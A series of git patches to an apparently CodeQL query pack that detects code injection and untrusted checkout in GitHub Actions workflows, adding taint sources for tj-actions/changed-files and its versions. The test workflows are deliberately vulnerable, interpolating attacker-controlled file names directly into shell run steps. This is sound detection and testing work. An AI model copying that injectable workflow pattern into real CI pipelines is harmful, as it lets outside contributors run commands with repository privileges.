+212,10 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -319,6 +325,8 @@ subpaths | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From b22e305699b1a3e56cb20dcf05db14ae8ece50d2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 23:32:42 +0200 Subject: [PATCH 241/707] Fix untrusted checkout tests --- ...or.expected => PrivilegedUntrustedCheckoutCritical.expected} | 0 .../Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref | 1 + ...arning.expected => PrivilegedUntrustedCheckoutHigh.expected} | 2 +- .../Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref | 1 + .../query-tests/Security/CWE-829/UntrustedCheckoutError.qlref | 1 - .../query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref | 1 - 6 files changed, 3 insertions(+), 3 deletions(-) rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckoutError.expected => PrivilegedUntrustedCheckoutCritical.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckoutWarning.expected => PrivilegedUntrustedCheckoutHigh.expected} (97%) create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected rename to ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref new file mode 100644 index 000000000000..8fe52c7d9147 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref @@ -0,0 +1 @@ +Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected similarity index 97% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected rename to ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index 628234f7e8b4..dc5a6bc915fc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,4 @@ -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref new file mode 100644 index 000000000000..32953132a45a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref @@ -0,0 +1 @@ +Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref deleted file mode 100644 index 1192fcfe6168..000000000000 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckoutError.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref deleted file mode 100644 index 8c77a95b48c7..000000000000 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckoutWarning.ql From 5d6a3c4900d427da833674a18796601c8e202a12 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Tue, 7 May 2024 09:45:12 +0200 Subject: [PATCH 242/707] Copy master branch only --- .github/workflows/copy-to-bughalla.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 572d987ce377..a6b568f2bfb2 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -1,6 +1,9 @@ name: Copy to Bughalla -on: push +on: + push: + branches: + - 'master' permissions: contents: read From 778c6ad923c5164cb86ff53f0e3ac461830d5f77 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 7 May 2024 10:41:42 +0200 Subject: [PATCH 243/707] Fix tj-actions/changed-files sources --- .../codeql/actions/dataflow/FlowSources.qll | 38 +++++++++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 60 +++++++++++++------ ql/lib/ext/tj-actions_changed-files.model.yml | 22 ------- .../tj-actions_verify-changed-files.model.yml | 6 -- .../.github/workflows/changed-files.yml | 29 +++++++-- .../Security/CWE-094/CodeInjection.expected | 12 ++-- .../CWE-094/PrivilegedCodeInjection.expected | 9 ++- 7 files changed, 117 insertions(+), 59 deletions(-) delete mode 100644 ql/lib/ext/tj-actions_changed-files.model.yml delete mode 100644 ql/lib/ext/tj-actions_verify-changed-files.model.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index db111b9e1900..b4cf1f70315c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -263,7 +263,7 @@ private class ArtifactSource extends RemoteFlowSource { /** * A list of file names returned by dorny/paths-filter. */ -private class DornyPathsFilterSource extends RemoteFlowSource { +class DornyPathsFilterSource extends RemoteFlowSource { DornyPathsFilterSource() { exists(UsesStep u | u.getCallee() = "dorny/paths-filter" and @@ -274,3 +274,39 @@ private class DornyPathsFilterSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } } + +/** + * A list of file names returned by tj-actions/changed-files. + */ +class TJActionsChangedFilesSource extends RemoteFlowSource { + TJActionsChangedFilesSource() { + exists(UsesStep u | + u.getCallee() = "tj-actions/changed-files" and + ( + u.getArgument("safe_output") = "false" or + u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 41 + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} + +/** + * A list of file names returned by tj-actions/verify-changed-files. + */ +class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { + TJActionsVerifyChangedFilesSource() { + exists(UsesStep u | + u.getCallee() = "tj-actions/verify-changed-files" and + ( + u.getArgument("safe_output") = "false" or + u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 17 + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 32c329d8c67c..cb391f2a2620 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -5,6 +5,7 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery @@ -43,10 +44,6 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { ) } -class EnvToRunTaintStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } -} - /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. @@ -119,28 +116,57 @@ predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { ) } -class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - artifactDownloadToUseStep(node1, node2) - } -} - /** * A read of the _files field of the dorny/paths-filter action. */ predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesStep u, StepsExpression o | - u.getCallee() = "dorny/paths-filter" and - u.getArgument("list-files") = ["csv", "json"] and - u = pred.asExpr() and - o.getStepId() = u.getId() and + exists(StepsExpression o | + pred instanceof DornyPathsFilterSource and + o.getStepId() = pred.asExpr().(UsesStep).getId() and o.getFieldName().matches("%_files") and succ.asExpr() = o ) } -class DornyPathsFilterTaintStep extends AdditionalTaintStep { +/** + * A read of user-controlled field of the tj-actions/changed-files action. + */ +predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = + [ + "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", + "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", + "all_changed_and_modified_files", "all_changed_files", "other_changed_files", + "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", + "changed_keys" + ] and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/verify-changed-files action. + */ +predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "changed_files" and + succ.asExpr() = o + ) +} + +class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - dornyPathsFilterTaintStep(node1, node2) + envToRunStep(node1, node2) or + artifactDownloadToUseStep(node1, node2) or + dornyPathsFilterTaintStep(node1, node2) or + tjActionsChangedFilesTaintStep(node1, node2) or + tjActionsVerifyChangedFilesTaintStep(node1, node2) } } diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml deleted file mode 100644 index 60fa01495733..000000000000 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ /dev/null @@ -1,22 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["tj-actions/changed-files", "*", "output.added_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.copied_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "filename", "manual"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "filename", "manual"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml deleted file mode 100644 index 9dccf6d5e6c6..000000000000 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ /dev/null @@ -1,6 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml index 12bade510ba4..85f59f6fa269 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml @@ -2,8 +2,6 @@ name: CI on: pull_request: - branches: - - main jobs: changed_files: @@ -13,13 +11,32 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - name: Get changed files - id: changed-files + + - name: Get changed files 1 + id: changed-files1 uses: tj-actions/changed-files@v40 + - name: List all changed files 1 + run: | + for file in ${{ steps.changed-files1.outputs.all_changed_files }}; do + echo "$file was changed" + done - - name: List all changed files + - name: Get changed files 2 + id: changed-files2 + uses: tj-actions/changed-files@v41 + - name: List all changed files 2 run: | - for file in ${{ steps.changed-files.outputs.all_changed_files }}; do + for file in ${{ steps.changed-files2.outputs.all_changed_files }}; do echo "$file was changed" done + - name: Get changed files 3 + id: changed-files3 + uses: tj-actions/changed-files@v41 + with: + safe_output: false + - name: List all changed files 3 + run: | + for file in ${{ steps.changed-files3.outputs.all_changed_files }}; do + echo "$file was changed" + done diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index e220d368b20b..e9738fa9458f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -6,7 +6,8 @@ edges | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$( Date: Tue, 7 May 2024 11:01:14 +0200 Subject: [PATCH 244/707] Update --- ql/test/library-tests/test.expected | 18 ------------------ .../PrivilegedUntrustedCheckoutHigh.expected | 2 +- 2 files changed, 1 insertion(+), 19 deletions(-) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index d7f944c5a3dc..c735596ae053 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -455,24 +455,6 @@ sources | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | | tj-actions/branch-names | * | output.ref_branch | branch | manual | -| tj-actions/changed-files | * | output.added_files | filename | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | filename | manual | -| tj-actions/changed-files | * | output.all_changed_files | filename | manual | -| tj-actions/changed-files | * | output.all_modified_files | filename | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | filename | manual | -| tj-actions/changed-files | * | output.changed_keys | filename | manual | -| tj-actions/changed-files | * | output.copied_files | filename | manual | -| tj-actions/changed-files | * | output.deleted_files | filename | manual | -| tj-actions/changed-files | * | output.modified_files | filename | manual | -| tj-actions/changed-files | * | output.modified_keys | filename | manual | -| tj-actions/changed-files | * | output.other_changed_files | filename | manual | -| tj-actions/changed-files | * | output.other_deleted_files | filename | manual | -| tj-actions/changed-files | * | output.other_modified_files | filename | manual | -| tj-actions/changed-files | * | output.renamed_files | filename | manual | -| tj-actions/changed-files | * | output.type_changed_files | filename | manual | -| tj-actions/changed-files | * | output.unknown_files | filename | manual | -| tj-actions/changed-files | * | output.unmerged_files | filename | manual | -| tj-actions/verify-changed-files | * | output.changed-files | filename | manual | | trilom/file-changes-action | * | output.files | filename | manual | | trilom/file-changes-action | * | output.files_added | filename | manual | | trilom/file-changes-action | * | output.files_modified | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index dc5a6bc915fc..628234f7e8b4 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,4 @@ -j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 6a87192f6491a36d107c49e871228cf6488721a1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 09:42:56 +0200 Subject: [PATCH 245/707] Account for insecure action versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 12 +++-- .../codeql/actions/dataflow/FlowSources.qll | 51 ++++++++++++++++++- .../.github/workflows/changed-files.yml | 18 +++++++ .../Security/CWE-094/CodeInjection.expected | 4 ++ .../CWE-094/PrivilegedCodeInjection.expected | 3 ++ .../CWE-829/UnpinnedActionsTag.expected | 32 ++++++------ 6 files changed, 98 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0cbb8ab10ed9..83787882d6fa 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -791,6 +791,8 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); + int getMajorVersion() { result = this.getVersion().regexpReplaceAll("\\..*", "").toInt() } + /** Gets the argument expression for the given key. */ string getArgument(string key) { exists(ScalarValueImpl scalar | @@ -832,8 +834,10 @@ class UsesStepImpl extends StepImpl, UsesImpl { ).toLowerCase() } - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ + override string getVersion() { + result = u.getValue().regexpCapture(usesParser(), 3).regexpReplaceAll("^v", "") + } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" @@ -865,12 +869,12 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | n.lookup("uses") = name and if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(repoUsesParser(), 4) + then result = name.getValue().regexpCapture(repoUsesParser(), 4).regexpReplaceAll("^v", "") else none() ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b4cf1f70315c..bfe85dbdbe6a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -284,7 +284,54 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/changed-files" and ( u.getArgument("safe_output") = "false" or - u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 41 + u.getMajorVersion() < 41 or + u.getVersion() + .matches([ + "56284d8", "9454999", "1c93849", "da093c1", "25ef392", "18c8a4e", "4052680", + "bfc49f4", "af292f1", "56284d8", "fea790c", "95690f9", "408093d", "db153ba", + "8238a41", "4196030", "a21a533", "8e79ba7", "76c4d81", "6ee9cdc", "246636f", + "48566bb", "fea790c", "1aee362", "2f7246c", "0fc9663", "c860b5c", "2f8b802", + "b7f1b73", "1c26215", "17f3fec", "1aee362", "a0585ff", "87697c0", "85c8b82", + "a96679d", "920e7b9", "de0eba3", "3928317", "68b429d", "2a968ff", "1f20fb8", + "87e23c4", "54849de", "bb33761", "ec1e14c", "2106eb4", "e5efec4", "5817a9e", + "a0585ff", "54479c3", "e1754a4", "9bf0914", "c912451", "174a2a6", "fb20f4d", + "07e0177", "b137868", "1aae160", "5d2fcdb", "9ecc6e7", "8c9ee56", "5978e5a", + "17c3e9e", "3f7b5c9", "cf4fe87", "043929e", "4e2535f", "652648a", "9ad1a5b", + "c798a4e", "25eaddf", "abef388", "1c2673b", "53c377a", "54479c3", "039afcd", + "b2d17f5", "4a0aac0", "ce810b2", "7ecfc67", "b109d83", "79adacd", "6e426e6", + "5e2d64b", "e9b5807", "db5dd7c", "07f86bc", "3a3ec49", "ee13744", "cda2902", + "9328bab", "4e680e1", "bd376fb", "84ed30e", "74b06ca", "5ce975c", "04124ef", + "3ee6abf", "23e3c43", "5a331a4", "7433886", "d5414fd", "7f2aa19", "210cc83", + "db3ea27", "57d9664", "0953088", "0562b9f", "487675b", "9a6dabf", "7839ede", + "c2296c1", "ea251d4", "1d1287f", "392359f", "7f33882", "1d8a2f9", "0626c3f", + "a2b1e5d", "110b9ba", "039afcd", "ce4b8e3", "3b6c057", "4f64429", "3f1e44a", + "74dc2e8", "8356a01", "baaf598", "8a4cc4f", "8a7336f", "3996bc3", "ef0a290", + "3ebdc42", "94e6fba", "3dbb79f", "991e8b3", "72d3bb8", "72d3bb8", "5f89dc7", + "734bb16", "d2e030b", "6ba3c59", "d0e4477", "b91acef", "1263363", "7184077", + "cbfb0fd", "932dad3", "9f28968", "c4d29bf", "ce4b8e3", "aa52cfc", "aa52cfc", + "1d6e210", "8953e85", "8de562e", "7c640bd", "2706452", "1d6e210", "dd7c814", + "528984a", "75af1a4", "5184a75", "dd7c814", "402f382", "402f382", "f7a5640", + "df4daca", "602081b", "6e12407", "c5c9b6f", "c41b715", "60f4aab", "82edb42", + "18edda7", "bec82eb", "f7a5640", "28ac672", "602cf94", "5e56dca", "58ae566", + "7394701", "36e65a1", "bf6ddb7", "6c44eb8", "b2ee165", "34a865a", "fb1fe28", + "ae90a0b", "bc1dc8f", "3de1f9a", "0edfedf", "2054502", "944a8b8", "581eef0", + "e55f7fb", "07b38ce", "d262520", "a6d456f", "a59f800", "a2f1692", "72aab29", + "e35d0af", "081ee9c", "1f30bd2", "227e314", "ffd30e8", "f5a8de7", "0bc7d40", + "a53d74f", "9335416", "4daffba", "4b1f26a", "09441d3", "e44053b", "c0dba81", + "fd2e991", "2a8a501", "a8ea720", "88edda5", "be68c10", "b59431b", "68bd279", + "2c85495", "f276697", "00f80ef", "f56e736", "019a09d", "3b638a9", "b42f932", + "8dfe0ee", "aae164d", "09a8797", "b54a7ae", "902e607", "2b51570", "040111b", + "3b638a9", "1d34e69", "b86b537", "2a771ad", "75933dc", "2c0d12b", "7abdbc9", + "675ab58", "8c6f276", "d825b1f", "0bd70b7", "0fe67a1", "7bfa539", "d679de9", + "1e10ed4", "0754fda", "d290bdd", "15b1769", "2ecd06d", "5fe8e4d", "7c66aa2", + "2ecd06d", "e95bba8", "7852058", "81f32e2", "450eadf", "0e956bb", "300e935", + "fcb2ab8", "271bbd6", "e8ace01", "473984b", "032f37f", "3a35bdf", "c2216f6", + "0f16c26", "271468e", "fb063fc", "a05436f", "c061ef1", "489e2d5", "8d5a33c", + "fbfaba5", "1980f55", "a86b560", "f917cc3", "e18ccae", "e1d275d", "00f80ef", + "9c1a181", "5eaa2d8", "188487d", "3098891", "467d26c", "d9eb683", "09a8797", + "8e7cc77", "81ad4b8", "5e2a2f1", "1af9ab3", "55a857d", "62a9200", "b915d09", + "f0751de", "eef9423" + ] + "%") ) and this.asExpr() = u ) @@ -302,7 +349,7 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/verify-changed-files" and ( u.getArgument("safe_output") = "false" or - u.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() < 17 + u.getMajorVersion() < 17 ) and this.asExpr() = u ) diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml index 85f59f6fa269..6d506e65a130 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml @@ -40,3 +40,21 @@ jobs: for file in ${{ steps.changed-files3.outputs.all_changed_files }}; do echo "$file was changed" done + + - name: Get changed files 4 + id: changed-files4 + uses: tj-actions/changed-files@0874344d6ebbaa00a27da73276ae7162fadcaf69 # v44.3.0 + - name: List all changed files 4 + run: | + for file in ${{ 